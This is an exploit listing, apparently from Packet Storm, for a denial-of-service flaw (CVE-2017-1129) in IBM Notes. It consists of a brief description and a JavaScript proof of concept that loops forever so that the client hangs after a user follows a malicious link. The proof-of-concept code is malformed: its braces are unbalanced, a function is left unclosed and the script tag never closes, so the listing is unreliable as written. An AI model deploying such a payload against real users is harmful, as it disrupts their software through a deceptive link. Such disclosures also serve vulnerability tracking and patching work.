IBM Notes 8.5.x / 9.0.x Denial Of Service

Type packetstorm
Reporter Dhiraj Mishra
Modified 2017-09-02T00:00:00


                                            `# Exploit Title: IBM Notes is affected by a denial of service vulnerability  
# Date: 31 August 2017  
# Software Link:  
# Exploit Author: Dhiraj Mishra   
# Contact:  
# Website:  
# CVE: CVE-2017-1129  
# Category: IBM Notes (Console Application)  
1. Description  
IBM Notes is vulnerable to a denial of service involving persuading a user to click on a malicious link, which would ultimately cause the client to have to be restarted.  
2. Proof of concept  
<script type="text/javascript">  
while (true) try {  
var object = { };  
function g(f0) {  
var f0 = (object instanceof encodeURI)('foo');  
} catch (g) { }  
3. IBM Security Bulletin